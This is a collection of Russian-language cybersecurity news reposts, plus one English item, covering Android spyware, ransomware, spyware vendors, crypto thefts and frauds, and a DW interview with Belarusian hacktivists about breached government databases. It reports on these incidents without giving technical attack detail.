Малварь, которая была включена в упомянутое обновление, это RAT AhRat, основанный на исходном коде опенсорсного AhMyth. При этом код, взятый из AhMyth, был сильно изменен, а разработчик явно знал, что он делает.
«Первая вредоносная версия iRecorder содержала части вредоносного кода AhMyth RAT, скопированные без каких-либо изменений. Вторая версия вредоноса, которую мы назвали AhRat, так же была доступна в Google Play, и здесь AhMyth уже был кастомизирован: появился код для связи с C&C-сервером и бэкдор. На момент написания этой публикации мы не обнаружили AhRat ни в одном другом приложении Google Play и где-либо еще», — пишут аналитики.
Click to expand...
Вредонос AhRat имеет широкий спектр возможностей, включая отслеживание местоположения зараженных устройств, кражу журналов вызовов, контактов и текстовых сообщений, отправку SMS-сообщений, запись фоновых звуков и фотографирование.
Эксперты ESET отмечают, что вредоносное приложение для записи экрана использовало лишь часть возможностей AhRat: каждые 15 минут оно записывало и передавало на удаленный сервер фоновые звуки (запись длилась примерно минуту), а также воровало файлы с определенными расширениями, что навело исследователей на мысли о кибершпионаже.
«К сожалению, у нас нет никаких доказательств того, что приложение старались навязать определенной группе людей. Из описания приложения и дальнейших исследований (в поисках возможного вектора распространения) неясно, была ли целью какая-то конкретная группа, — пишет эксперт ESET Лукас Стефанко (Lukáš Štefanko). — Это кажется весьма необычным, но у нас нет доказательств обратного».
Click to expand...
В настоящее время приложение уже удалено из Google Play, однако эксперты предупреждают, что iRecorder – Screen Recorder может быть доступен в альтернативных и неофициальных магазинах приложений для Android.
Нужно отметить, что это не первый случай, когда в Google Play проникает малварь, основанная на опенсорсном AhMyth. Так, в 2019 году все те же специалисты ESET обнаружили в магазине приложения Radio Balouch и RB Music, которые действительно содержали легитимные компоненты для потокового радиовещания, но также были заражены AhMyth.
Источник: хакер.ру
В Китае суд вынес приговор хакеру, который с помощью трояна похитил с телефона
жертвы более 383
ETH.
Об этом
сообщили
местные СМИ.
Как следует из материалов дела, в марте и апреле 2018 г хакер произвел более
520 транзакций на общую сумму 383,6 ETH. Чтобы получить доступ к кошельку
imToken на телефоне жертвы, подсудимый использовал троян. Позже злоумышленник
обменял украденные монеты на 109 458 USDT.
Правоохранительным органам удалось установить личность злоумышленника. После
его задержания полиция вернула часть украденных средств потерпевшему.
Суд приговорил хакера к 10 годам и шести месяцам лишения свободы, а также
штрафу в размере 200 000 юаней (более $28 000).

Evil Corp. запустила новую программу-вымогатель под названием Macaw Locker, чтобы избежать санкций США, которые не позволяют жертвам выплачивать выкуп.
Хакерская группа Evil Corp, также известная как Indrik Spider, занимается киберпреступностью с 2007 года, но в основном как дочерняя компания других организаций. Со временем команда начала сосредотачиваться на собственных атаках, создавая и распространяя в фишинговых атаках банковского трояна, известного как Dridex. По мере того, как атаки программ-вымогателей становились все более прибыльными, Evil Corp запустила функцию под названием BitPaymer, которая была доставлена через вредоносное программное обеспечение Dridex для повреждения корпоративных сетей. Преступная деятельность группы в конечном итоге привела к санкциям со стороны правительства США в 2019 году. В результате этих санкций компании, торгующие программами-вымогателями, больше не будут способствовать выплате выкупа за транзакции, приписываемые Evil Corp. Чтобы обойти санкции США, Evil Corp. начала создавать ограниченные функции вымогателей под разными именами, такими как WastedLocker, Hades, Phenoix Locker и PayloadBin.
Другие семейства программ-вымогателей, которые, как считается, не связаны с Evil Corp, - это DoppelPaymer, недавно переименованная в Grief. В этом месяце Olympus и Sinclair Broadcast Group столкнулись с серьезными сбоями в работе из-за атак программ-вымогателей. Синклер был вынужден отменить телешоу, а ведущие новостей рассказывали новости с помощью диаграмм и газет.
На этой неделе было обнаружено, что обе атаки были осуществлены новой программой-вымогателем, известной как Macaw Locker. Технический директор Emsisoft Фабиан Восар сказал, что на основе анализа кода Macaw Locker является последним ребрендингом семейства вымогателей Evil Corp. Единственные две известные жертвы шкафчика ара - Синклер и Олимп. Источники также поделились личными страницами жертв Macaw Locker для двух атак, где угрожающие агенты потребовали выкуп в размере 450 биткойнов, или 28 миллионов долларов, за одну атаку и 40 миллионов долларов за другую.
Программа-вымогатель Macaw Locker шифрует файлы жертв и добавляет расширение .macaw к имени файла при выполнении атак. Эта продолжающаяся игра в кошки- мышки, вероятно, не скоро закончится, если Evil Corp не остановит атаки программ-вымогателей или не снимет санкции. Однако ни один из этих сценариев вряд ли состоится в ближайшем будущем.
Источник: <https://www.secnews.gr/370677/evil-corp-apaitei-40-ekatommyria- dolaria-epitheseis-ransomware-macaw/>
Россия после начала специальной военной операции на Украине стала «страной- изгоем», в которой начали укрываться отдельные киберпреступники и даже целые группировки. Такое мнение в интервью The Record высказала заместитель генерального прокурора США Лиза Монако ( Lisa Monaco ).
Монако вспомнила, что еще в годы президентства Барака Обамы она занимала пост советника по национальной безопасности и борьбе с терроризмом. Именно тогда, по ее мнению, несколько стран начали активнее и куда агрессивнее создавать киберугрозы для Америки. В число этих государств Монако включила Китай, Иран, КНДР и Россию.
«Теперь хакеры и кибермошенники объединяются с обычными преступными группировками и часто находят убежище в государствах-изгоях. Я говорю в первую очередь о России. Поэтому я сказала своей команде, что нам нужно менять модель поведения, сделать шаг на опережение, нанести удар до того, как появятся новые жертвы», — рассказала Монако, приведя в качестве примера реализации этой стратегии ликвидацию площадок Genesis Market, Hive, ChipMixer, BreachForums, а также российской «Гидры».
source: therecord.media/lisa-monaco-click-here-interview-genesis-market- cybercrime
Более 100 агентов бразильской полиции провели одновременный рейд в трех федеральных штатах по двадцати адресам, связанным с мошеннической сетью, которую контролировал Франсиско Вальдевино да Силва.
По данным властей, группа Франсиско Вальдевино да Силвы (Francisco Valdevino da Silva), также известного как «биткоин-шейх», подозревается в хищении и отмывании криптоактивов на сумму более $700 млн у тысяч бразильцев, а также граждан по меньшей мере десяти других латиноамериканских стран и США.
В большинстве случаев преступники обещали инвесторам ежемесячный доход до 20% от вложений, утверждая, что их команда «опытных криптовалютных трейдеров поспособствует гарантированному получению прибыли». Помимо этого, банда Де Сильвы предлагала инвестировать в якобы их собственные криптовалюты, которые по факту не имели ни поддержки, ни ликвидности.
Полицейский рейд прошел после завершения международного расследования по линии Интерпола, проведенного совместно с Министерством внутренней безопасности США. Из опубликованных органами материалов стало известно, что помимо Де Сильвы к управлению мошеннической сетью были причастны члены его семьи.
Напомним, что в конце сентября федеральная полиция Бразилии провела обыски в 15 фирмах и задержала 11 человек, подозреваемых в создании криптовалютной пирамиды. Расследование показало, что организаторы создали сеть фиктивных криптокомпаний, с помощью которой выманили у жертв около $6 млн.
"Если не можете защитить в своих компьютерах информацию, тогда возвращайтесь к бумажным носителям. Пишите от руки и складывайте у себя в ящик", - сказал Александр Лукашенко на совещании 17 августа. Это единственный официальный комментарий, который можно связать со взломом базы данных МВД Беларуси.
О взломе заявили "Киберпартизаны" - анонимная команда IT-специалистов, в распоряжении которых, как они утверждают, оказалась система с паспортными данными всех белорусов, аудиозаписи прослушек силовиков и чиновников, данные управления собственной безопасности МВД и многое другое. Часть этой информации уже выложили в Сеть. "Киберпартизаны" общаются с аудиторией через одноименный телеграм-канал. В нем - более 77 тысяч подписчиков.
Deutsche Welle договаривается об интервью с "Киберпартизанами" через чат-бот, общение проходит письменно в анонимизированном чате. На вопросы "Киберпартизаны" отвечают в течение трех дней. По словам их представителя, иногда они журналистам отвечают голосом, но никогда - в режиме реального времени: "Записываем аудио, обрабатываем ("анонимизируем"), отсылаем".
Через минуту - все паспортные данные
"Киберпартизаны" утверждают, что взломали систему "Паспорт", в которую внесены личные данные всех белорусов. Проверяем, действительно ли это так.
Называю свое имя (эта статья подписана псевдонимом. - Ред.) - и уже через минуту получаю ответ: людей с таким именем в Беларуси - всего два человека. Еще через минуту мне присылают фотографии, которые использовались во всех выданных паспортах, а также личные данные, адрес прописки и сведения о родителях. Все совпадает - и даже ошибка, которую несколько лет назад сотрудник отдела по гражданству и миграции внес в базу. Доступ к данным системы "Паспорт" у них действительно есть.
Кто такие «Киберпартизаны»?
"Киберпартизаны" - это часть организации "Супраціў", которая состоит из "Кибер-партизан", "Буслы ляцяць" и "Дружины народной самообороны". По словам "Киберпартизанов", у них есть "маленький костяк админов" и еще примерно 12-15 волонтеров. Все эти люди - из сферы IT, профессиональных хакеров нет, подчеркивает наш собеседник. "Всему научились на ходу. Взломами сетей и баз данных в основном занимаются три-четыре "кибера", плюс еще 3-4 - на базовом уровне. Остальные разрабатывают приложения, такие как "Партизанский телеграм" и P-SMS", - рассказывает один из участников команды "Киберпартизаны".
Свое местоположение "Киберпартизаны" обсуждать отказываются "в целях безопасности". Как и то, как образовалась их группа и люди с каким бэкграундом в нее входят.
Киберпартизаны остаются анонимными
DW: Вы осознаете, что взлом баз данных - это реальное преступление?
"Киберпартизаны": Мы осознаем, что, когда соблюдались законы в РБ, наша деятельность могла считаться преступной. В 2020-м власть была узурпирована. Конституция грубо нарушается так называемыми "правоохранительными органами". В сложившейся ситуации это наш гражданский долг - сопротивляться захвату власти в РБ.
DW: В вашей команде реальные люди, которым пришлось совершить преступление. Как вы это воспринимаете?
"Киберпартизаны": Мы не действуем под влиянием эмоций. Считаем, что в сложившейся ситуации правового краха в Беларуси на нас - тех, кто реально способен вести борьбу с тиранией, - лежит [за это] ответственность перед своей совестью.
По словам представителя команды, после взлома баз данных они рассчитывали "на звездопад и увольнения верхушки МВД", но этого не случилось. "Но мы до сих пор считаем, что он в итоге будет, только, наверное, с задержкой. Уголовные дела (по взлому. - Ред.), скорее всего, заводят. Попытаемся взломать базу, где это записано, - и тогда будем знать точно", - говорят "Киберпартизаны" в интервью DW. Они заверяют, что серьезных угроз в адрес их команды пока не поступало.
Как "Киберпартизаны" гарантируют безопасность данных?
DW: На какие критерии вы ориентируетесь, когда выбираете, что будете взламывать?
"Киберпартизаны": Мы ориентируемся на самые уязвимые точки режима. Удар по МВД имеет стратегическое значение. Он вводит всю систему в дезориентацию. Пока режим пытается погасить этот пожар, мы уже интенсивно работаем над другими ударами по подпоркам режима. Раньше мы занимались более мелкими и точечными взломами. Что могли, то и взламывали, например, сайты, различные базы данных в полуоткрытом доступе и т.п. Но в фоновом режиме мы наращивали серьезных киберов и укреплялись в сетях режима.
Очень много времени уходит на неудачные попытки взлома и подготовительную работу. В таких сложных операциях редко бывают блицкриги. Даже такая более простая цель, как Академия управления при президенте, заняла более чем шесть месяцев с момента обозначения цели. Повторный взлом Академии уже был больше похож на блицкриг. За несколько дней мы аннулировали базы данных и положили наглухо внутреннюю сеть.
Как рассказывает собеседник, взлом внутренних сетей занимает "много месяцев работы". Бывают и неудачные попытки. Полученные в результате взлома данные, утверждает представитель "Киберпартизанов", хранятся в зашифрованном формате и "недоступны напрямую из интернета". По его словам, ограниченный доступ к некоторым базам также имеют сторонние "доверенные организации". В их числе - ByPol, ЧКБ, Каратели Беларуси, НАУ, перечисляет один из участников команды "Киберпартизаны".
DW: Вы заявили, что взломали базу с прослушкой силовиков, базу данных Управления собственной безопасности МВД и другие. То есть узнали, как выглядит и функционирует эта система изнутри. Что вас поразило в ней больше всего?
"Киберпартизаны": Иногда не соблюдаются элементарные меры безопасности. Например, использование простых паролей и их повторное использование, ограничение доступа с помощью active directory, изоляция подсетей друг от друга. Некоторые центральные базы данных находятся в одной подсети вместе с отделами РОВД. Система явно была заточена под идеологию предотвращению кибератак исключительно запугиванием и террором.
DW: По действующим законам, данные, полученные с нарушением закона, не могут считаться доказательством чьей-то вины. В чем тогда цель ваших взломов?
"Киберпартизаны": Во-первых, не было установлено, каким именно способом данные были получены. Во-вторых, они могут быть использованы для убеждения стран Запада ввести более жесткие санкции. Также эти данные могут быть использованы на суде в Гааге. Самое главное, что народ получает слитые разговоры и делает собственные выводы. А оставшиеся силовики уже не могут так просто оправдать свое участие в этом перед семьей и друзьями.
"Пока мы не успели обработать даже 0,1% записей"
DW: Вы пишете, что взломали базу данных с прослушкой силовиков и чиновников. А кого еще, кроме самих себя, "слушает" белорусское государство?
"Киберпартизаны": Наш фокус на данный момент - это чиновники и силовики, и мы пока не пробивали все номера, которые стояли на прослушке. Уже сейчас можем констатировать, что на прослушке у режима стоят объекты из госпредприятий и учреждений здравоохранения, а также предприниматели и бизнесмены. На серверах прослушки в ДООРД (Департамент обеспечения оперативно-розыскной деятельности МВД. - Ред.) есть несколько сотен тысяч часов аудиозаписей. Нам нужно некоторое время, чтобы обработать все, что есть, и разложить по полочкам. Пока мы не успели обработать даже 0,1% записей.
DW: В вашем распоряжении оказались данные миллионов белорусов. Где гарантия, что их личные данные будут в безопасности и никто из обычных людей не пострадает?
"Киберпартизаны": В МВД эти данные явно не защищены. Мы достаточно хорошо разбираемся в кибербезопасности и считаем, что у нас данные граждан будут защищены лучше, чем у режима.
DW: Во время проверки я запросила у вас данные коллеги, у которой получила на это разрешение. Тем не менее вы предоставили их без ее личного согласия, поверив мне на слово. Как вы гарантируете, что кто-то не попытается сделать похожий запрос и использовать эти данные с целью мошенничества?
"Киберпартизаны": Мы "подтверждаем" журналистов перед тем, как передавать им какие-либо данные о мирных гражданах. Наши протоколы на эту тему еще в процессе разработки. В вашем случае мы допустили ошибку.
DW: Как вы контролируете внутри своей команды, не получает ли кто-то доступ к данным по личным мотивам?
"Киберпартизаны": Доступ к базам данных в сыром виде имеем только мы, админы. Для всех остальных, кто должен работать с базами, мы разработали авторский поисковик, у них ограниченный доступ, все запросы логируются во избежание злоупотреблений. Количество запросов в день ограничено, также есть дополнительные механизмы мониторинга.
DW: Вы намерены публиковать данные сотрудников КГБ. Но, вероятно, не все они участвовали в противозаконных действиях в отношении своих же граждан. Кто-то наверняка занимался внешними угрозами, и публикация их данных может нанести урон РБ. Как вы будете определять, чьи данные сливать, а чьи - нет? По какому принципу?
"Киберпартизаны": Мы считаем, что КГБ - это исключительно карательный орган, и их вклад в национальную безопасность на данный момент несущественный. Они в основном занимаются репрессиями.
В базе "Беспорядки" - почти 39 тысяч человек
"Киберпартизаны" утверждают, что МВД создало базу данных под названием "Беспорядки". По их информации, за последний год туда внесли порядка 38 600 граждан. В ней можно найти паспортные данные на каждого, дату задержания и его последствия: "составлен протокол", "отпущен", "помещен в ИВС / ЦИП / Жодино". Это подтверждают скриншоты, которые "Киберпартизаны" предоставили в распоряжение DW.
Большинство граждан, которые попали в эту базу, привлекались по статье 23.34 КоАП (нынешняя 24.23, статья, по которой часто судят участников протестов). Также в ней есть те, кого задерживали за неповиновение и мелкое хулиганство. Кроме этого, в базу попали подозреваемые по уголовной статье 293 "Массовые беспорядки".
Еще один "трофей" группы "Киберпартизаны" - автоматизированная информационная система "Паспорт". В ней хранятся паспортные данных всех граждан Беларуси, а также их адреса прописки, данные о родственниках, а у некоторых - место работы и должность. В этой базе, утверждают "Киберпартизаны", есть скрытые записи - таких около 16 тысяч. К ним есть доступ "только у ограниченного списка лиц из МВД".
DW: Скрытые данные - о ком? Что вы может об это сказать?
"Киберпартизаны:" Как правило, скрыты все члены семьи Лукашенко, семьи Бакиева (бывший президент Кыргызстана, который находится в Беларуси). Кроме этого, силовики. Пока мы еще не закончили анализировать эти записи. В списках точно есть сотрудники КГБ, "Альфа" и других спецподразделений, иногда - члены их семей.
В АИС "Паспорт" можно найти в том числе данные сотрудников КГБ и ГРУ, их фотографии. Но для их вычисления требуется достаточно много ручной работы. Самые интересные выводы получаются, когда мы совмещаем АИС "Паспорт" с другими базами, которые есть в нашем распоряжении. Сейчас мы составляем досье на каждого сотрудника КГБ и планируем сливать их поэтапно.
Что удалось найти в базе данных МВД
По словам участников группы "Киберпатизаны", они также проникли в базу данных управления собственной безопасности МВД. В ней, утверждают хакеры, зафиксировано более 6600 проступков и преступлений, совершенных сотрудниками ведомства.
DW: О чем именно идет речь?
"Киберпартизаны": Там есть множество нарушений правил информационной безопасности - то, что больше всего нас интересовало. Кроме того, в базе можно найти драки, факты пьянства (...). Некоторых сотрудников уволили или посадили, но большинство остались в системе.
DW: Вы также заявляете, что получили доступ к видео с ИВС на Окрестина. За какой период у вас есть данные? Есть ли там видео того, что происходило 9-13 августа 2020 года? Почему вы их не обнародуете?
"Киберпартизаны": Мы взломали вещание камер из тюрем и ИВС, а также временное хранилище видеозаписей, где они находятся 1-2 недели. Так как мы до сих пор работаем над этим взломом, больше комментировать не можем. Будьте уверены, что как только у нас будет информация, которую важно донести до народа, мы это сделаем незамедлительно.
DW: В вашем распоряжении, наверняка, больше данных, чем вы публикуете?
"Киберпартизаны": Мы публикуем данные постепенно по нескольким причинам. Во- первых, большая часть данных никому не интересна. Во-вторых, в базах есть личные данные граждан. Нужно фильтровать, а это занимает много времени. В-третьих, мы не хотим довести людей до информационной и эмоциональной сатурации. Если сливать все одним махом, то большая часть важной информации не получит то внимание, которого она заслуживает.
Мы считаем, что некоторую информацию еще рано выносить на свет. Многие люди сейчас деморализованы и в результате репрессий деполитизировались. Мы стремимся пробудить народ и проинформировать о том, что было, есть и будет.
DW: Вы опубликовали личные данные силовиков, карту, кто где живет и так далее. То есть используете те же методы, что и госпропаганда, которая публиковала данные "предателей" в своих телеграм-каналах и на различных сайтах. Вы считаете приемлемым использовать те же способы, что и те, против кого вы боретесь?
"Киберпартизаны": В распоряжении режима весь силовой аппарат. Они пишут законы, управляют деньгами народа. У них есть все инструменты борьбы, и, несмотря на все это, они занимаются деаноном мирных граждан. Мы обнародуем в основном данные тех, кто совершил преступления - насилие, превышение полномочий, соучастие в узурпации власти и т.п. Считаем, что наши методы работы вполне допустимы в сложившейся ситуации.
Мы уверены, что силовики уже поняли, что ничего не останется засекреченным. Рано или поздно вся информация об их преступлениях будет обнародована. И считаем, что самые важные последствия обнародования данных - это снижение вероятности насилия и нарушения законов в будущем.
Израильская компания, продающая шпионские программы правительствам, использовала поддельные сайты движения Black Lives Matter и правозащитной организации Amnesty International для хакерских атак, [утверждает газета «Гардиан»](https://www.theguardian.com/technology/2021/jul/15/spyware-company- impersonates-activist-groups-black-lives-matter).
Исследователи из лаборатории Citizen Lab Университета Торонто, сотрудничающие с Microsoft, опубликовали отчет о Candiru, компании из Тель-Авива, продающей «неотслеживаемые» шпионские программы, которые могут заражать и контролировать компьютеры и телефоны.
Одним из способов заражения предположительно является использование фальшивых сайтов, и исследователи обнаружили, что программное обеспечение компании было связано с URL-адресами, маскирующимися под неправительственные организации, защитников прав женщин, группы активистов, организации здравоохранения и новостные СМИ. Исследование Citizen Lab выявило сайты, связанные с Candiru, с такими доменными именами, как “Amnesty Reports”, "Refugee International", "Woman Studies", "Euro News" и "CNN 24-7".
Исследователи не подтвердили причастность к деятельности компании каких-либо конкретных правительств. Microsoft заявила, что, по всей видимости, Candiru продает шпионское ПО, которое позволяет осуществлять взломы, и, как правило, правительства сами выбирают, на кого нацелиться, и сами проводят операции.
Результаты исследования свидетельствуют, что секретная и малоизвестная компания с широким глобальным охватом может помогать правительствам взламывать и отслеживать людей в гражданском обществе. Отчет появился на фоне растущей обеспокоенности по поводу технологий наблюдения, которые могут способствовать нарушениям прав человека, незаконному мониторингу со стороны правоохранительных органов и пресечению деятельности активистов.
Microsoft провел собственный анализ и сообщил, что обнаружил не менее 100 целей вредоносного ПО, связанного с Candiru, включая политиков, правозащитников, журналистов, ученых, сотрудников посольств и политических диссидентов. Это люди, живущие в Великобритании, Палестинской автономии, Израиле, Иране, Ливане, Йемене, Испании, Турции, Армении и Сингапуре, говорится в отчете.
Microsoft сообщил, что обезвредил Candiru и создал средства защиты от вредоносной программы, включая выпуск обновления программного обеспечения Windows.
У разведывательных фирм или их правительственных клиентов нет законных причин для создания веб-сайтов, выдающих себя за известные активистские группы и некоммерческие организации, сказал в интервью Билл Марчак, соавтор доклада.
Активисты, ставшие объектом атаки, переходят по ссылкам, которые кажутся ссылками на надежные источники, а затем попадают на сайт, где в фоновом режиме запускается код, который незаметно перехватывает контроль над их компьютером.
Вредоносная программа может обеспечить постоянный доступ практически ко всем данным на компьютере, что потенциально позволит правительствам красть пароли и документы или включать микрофон, чтобы шпионить за окружением жертвы.
«Пользователь и не поймет, что тут что-то не так», – сказал Марчак, старший научный сотрудник Citizen Lab, который тщательно изучал британские, немецкие и итальянские компании, занимающиеся разработкой шпионских программ, и ранее раскрыл деятельность NSO Group, другой израильской компании, которая якобы позволила правительству взломать телефоны журналистов и активистов.
Использование шпионских программ может иметь разрушительные последствия для активистов и диссидентов. Так, Ахмед Мансур, правозащитник из Объединенных Арабских Эмиратов, был арестован и избит после того, как его телефон взломали и следили за ним с помощью шпионских программ, приобретенных ОАЭ.
Как говорится в докладе, компания Candiru была основана в 2014 году и с тех пор несколько раз меняла название. Предполагается, что сейчас она зарегистрирована как Saito Tech Ltd, но по-прежнему известна как Candiru. В 2017 году объем продаж фирмы составил около 30 млн долларов, она обслуживала клиентов в Персидском заливе, Западной Европе и Азии. Возможно, компания заключила сделки с Узбекистаном, Саудовской Аравией и ОАЭ. Попавший в руки исследователей документ утверждает, что продукт не используется в США, России, Китае, Израиле или Иране.
Однако Microsoft сообщил, что им известны жертвы в Израиле и в Иране.
Citizen Lab заявила, что ей удалось идентифицировать компьютер, который был взломан вредоносной программой Candiru, а затем использовать жесткий диск для извлечения копии шпионской программы фирмы для Windows. Владелец компьютера был «политически активным» человеком в Западной Европе, говорится в отчете.
Команда также выявила более 750 доменных имен, которые, как оказалось, были связаны с Candiru и ее клиентами. Помимо сайтов, маскирующихся под некоммерческие организации, исследователи обнаружили URL-адреса, которые выдавали себя за леворадикальное индонезийское издание; сайт, публикующий обвинительные заключения израильских судов в отношении палестинских заключенных; сайт, критикующий кронпринца Саудовской Аравии Мохаммеда бин Салмана; и сайт, связанный со Всемирной организацией здравоохранения.
«Очевидное присутствие Candiru и использование ее технологии слежки против глобального гражданского общества является мощным напоминанием о том, что индустрия наемных шпионских программ состоит из множества игроков и подвержена широкомасштабным злоупотреблениям, – говорится в докладе. – Этот случай еще раз демонстрирует, что в отсутствие каких-либо международных гарантий или жесткого государственного экспортного контроля поставщики шпионских программ будут продавать их правительственным клиентам, которые будут регулярно злоупотреблять их услугами».
• Source: <https://detaly.co.il/eshhe-odna-izrailskaya-kiberkompaniya- zameshana-v-somnitelnoj-afere/>
The Swedish Public Health Agency (Folkhälsomyndigheten) has shut down SmiNet, the country's infectious diseases database, on Thursday after it was targeted in several hacking attempts.
[SmiNet](https://www.folkhalsomyndigheten.se/smittskydd-beredskap/overvakning- och-rapportering/sminet/), which is also used to store electronic reports with statistics on COVID-19 infections, was shut down on Thursday to investigate the attacks and was brought back online on Friday evening.
"The Swedish Public Health Agency has discovered that there have been several
attempted intrusions into the SmiNet database. The database has therefore been
closed down temporarily," the agency
[said](https://www.folkhalsomyndigheten.se/nyheter-och-
press/nyhetsarkiv/2021/maj/folkhalsomyndigheten-anmaler-forsok-till-
dataintrang-mot-sminet/) on Thursday, May 27.
"Work is underway to investigate as quickly as possible whether anyone may
have accessed sensitive personal data from the database, as well as sort out
and rectify any deficiencies."
The Swedish Public Health Agency could not report complete COVID-19 stats starting with Wednesday at 4 PM due to the database shut down.
Additionally, while the investigation on the intrusion attempts is ongoing, no additional updates will be issued.
While no evidence of unauthorized parties accessing sensitive information was
found so far, the investigation will take at least a few more days until the
reporting process will be restarted.
"The investigation into unauthorized access to sensitive information is still
ongoing," the agency [added](https://www.folkhalsomyndigheten.se/nyheter-och-
press/nyhetsarkiv/2021/maj/nasta-uppdatering-av-covid-19-statistik-pa-
torsdag/) in an update published today.
"More time is needed to ensure that the statistics are complete, so that a
reliable assessment of the epidemiological situation can be made. Therefore,
the next update of the statistics on cases of COVID-19 will be on Thursday,
June 3."
"At the moment there is no sign of information being taken out of the database, but the agency is still investigating the incident, as well as looking for (and fixing) any security weaknesses," a Folkhälsomyndigheten spokesperson told bleepingcomputer[.]
"We taken the incident very seriously and it is reported to the Swedish Police
as well as the Swedish Authority for Privacy Protection."
The 1177 Swedish Healthcare Guide service for health care information was hit
by a data breach two years ago after the company that managed its storage
server exposed it to public access on the Internet.
Millions of health care call recordings going back to 2013 were stored on the misconfigured server, exposing callers' personal info shared during roughly 170,000 hours left out in the open.
European health care has been under attack the last two weeks, with Ireland's Department of Health (DoH) and publicly funded healthcare system HSE (Health Service Executive) breached by Conti ransomware operators.
According to the Federal Bureau of Investigation (FBI), the Conti ransomware gang has also attempted to breach the networks of more than a dozen U.S. healthcare and first responder organizations.
В связи с участившимися взломами протоколов DeFi на основе Binance Smart Chain, разработчики призвали создателей проектов к проведению многоуровневых проверок.
В последнее время блокчейн Binance Smart Chain (BSC) стал «эпицентром» хакерских атак на проекты DeFi. Они один за другим становятся жертвами злоумышленников, использующих ошибки в кодах. В этом году от действий хакеров уже пострадали проекты PancakeBunny, Cream Finance, bEarn, Bogged Finance, Uranium Finance, Meerkat Finance, SafeMoon, Spartan Protocol и BurgerSwap.
Недавно этот список пополнил и протокол Belt Finance, который за выходные потерял около 50 млн BUSD. Разработчики Binance Smart Chain предположили, что эти хакерские атаки могут быть связаны между собой.
«Недавно было совершено восемь атак с использованием быстрых кредитов. Мы полагаем, что это дело рук хорошо организованных хакеров, нацеленных на Binance Smart Chain. Сейчас сообщество BSC переживает сложные времена, поэтому мы призываем разработчиков децентрализованных приложений всегда быть начеку и принять необходимые меры для предотвращения рисков», - написали разработчики BSC в Твиттере.
Они предложили, чтобы создатели протоколов DeFi тесно взаимодействовали с аудиторскими компаниями и неоднократно проверяли работоспособность своей системы. Если стартап является форком другого проекта, не стоит пренебрегать двойной, а если необходимо, и тройной проверкой кода в смарт-контрактах. Кроме того, разработчики Binance Smart Chain порекомендовали проектам составить план действий в непредвиденных ситуациях и продумать программу компенсации, если придётся возмещать убытки пользователей после хакерских атак. Для этих целей можно создать специальные резервные фонды.
Напомним, что на прошлой неделе аналитическая компания CipherTrace добавила поддержку Binance Smart Chain для отслеживания подозрительных транзакций в этой сети. Разработчики надеются, что это повысит доверие к Binance Smart Chain.
Издание The Record сообщает, что китайская ИБ-компания Qingteng Cloud Security обнаружила атаки на пользователей WeChat, в которых злоумышленники задействовали опубликованный на прошлой неделе эксплоит для Chrome.
Атаки были предельно просты: китайским пользователям WeChat (только Windows- версии приложения) присылали вредоносные ссылки. Если пользователь переходил по такой ссылке, запускался JavaScript-код, который загружал и выполнял шелл- код в системе жертвы.
Известно, что злоумышленники использовали PoC-эксплоит для свежей уязвимости в Chromium. Напомню, что на прошлой неделе в сети были опубликованы сразу два таких эксплоита, и о котором из них идет речь, пока неизвестно. Стоит сказать, что в настоящее время оба бага исправлены Microsoft Edge, а в Chrome устранена только первая ошибка.
__https://twitter.com/x/status/1383437408184672257
Дело в том, что WeChat тоже использует Chromium для открытия и предварительного просмотра ссылок, чтобы не открывать отдельный браузер, а значит, он может быть подвержен обеим проблемам. А на прошлой неделе исследователи подчеркивали, что их эксплоиты не способны сбежать из песочницы, но могут работать с приложениями, которые используют Chromium в качестве основы, без песочницы.
Специалисты Qingteng Cloud Security сообщили, что уже уведомили о проблеме Tencent, разработчика WeChat, и компания поспешила интегрировать в свое приложение последние обновления безопасности Chromium.
Источник: xakep.ru/2021/04/20/wechat-attacks/
Эксперты французского исследовательского института INRIA, работающего в области компьютерных наук, теории управления и прикладной математики, сообщают, что правоохранительные органы плохо справляются с очисткой PDF-документов, которые публикуют на своих сайтах. В итоге из этих файлов можно почерпнуть много конфиденциальной информации, которую затем можно использовать для атак.
К таким выводам специалисты пришли после изучения 39 664 PDF-файлов, опубликованных на 75 сайтах силовых структур из 47 стран мира. Выяснилось, что лишь 38 ведомств имеют строгую политику в отношении программного обеспечения и регулярно обновляют свое ПО.
Так, восстановить конфиденциальные данные удалось из 76% проанализированных файлов. В частности, исследователи обнаружили:
Исследователи предупреждают, что злоумышленники могут специально собирать такие документы с сайтов силовых структур и создавать профили как на отдельных сотрудников, так и на ведомства в целом.
«Например, мы нашли сотрудника силового ведомства, который ни разу не менял и не обновлял свое программное обеспечение более 5 лет. Также мы обнаружили в нашем наборе данных по меньшей мере 19 силовых структур, которые используют одно и то же программное обеспечение на протяжении двух и более лет.
Такая информация будет особенно интересна хакеру, который хочет нацелиться на человека с плохими софтверными привычками», — рассказывают авторы научной работы.Click to expand...
Даже когда правоохранители стараются очистить свои PDF-файлы от метаданных и артефактов, очистка редко соответствует стандартам и обычно оставляет после себя пригодные для использования данные. По словам исследователей, только 7 из 75 ведомств вообще старались очистить PDF-документы, но на деле только 3 из них удалили из файлов все конфиденциальные данные.
[](https://xakep.ru/wp- content/uploads/2021/03/343087/security-agencies-profiles.png)
Источник: xakep.ru/2021/03/15/hidden-data-in-pdf-files/
На протяжении многих лет инженеры Google являлись одними из наиболее ярых сторонников повышения безопасности браузеров, наряду с разработчиками Firefox и Tor.
Уже давно одним из ключевых вопросов, интересующих разработчиков Chrome, является продвижение использования HTTPS как внутри браузеров, так и среди владельцев сайтов. Очередным шагом на пути к повсеместному HTTPS стало то, что с недавних пор Chrome автоматически пытается перейти с HTTP на HTTPS, если HTTPS доступен. Также браузер блокирует загрузки из HTTP-источников (даже если в URL-адресе страницы стоит префикс HTTPS), чтобы пользователи не считали, будто их загрузка защищена, если на самом деле это не так.
Хотя около 82% всех сайтов уже работают на HTTPS, переход на HTTPS в глобальном смысле еще нельзя считать завершенным. Поэтому в Chrome 90, выпуск которого запланирован на середину апреля текущего года, появится новая функция.
Изменение повлияет на омнибокс Chrome (так в Google называют адресную строку браузера). В текущих версиях, когда пользователь вводят в омнибокс ссылку, Chrome загружает введенную ссылку независимо от использованного протокола. Сейчас если пользователь забудет написать HTTP или HTTPS, Chrome автоматически добавит перед текстом «http://» и попытается загрузить сайт. К примеру, domain.com превратится в http://domain.com.
С релизом Chrome 90 это изменится. Начиная с этой версии омнибокс будет загружать все домены через HTTPS, автоматически подставляя соответствующий префикс «https://».
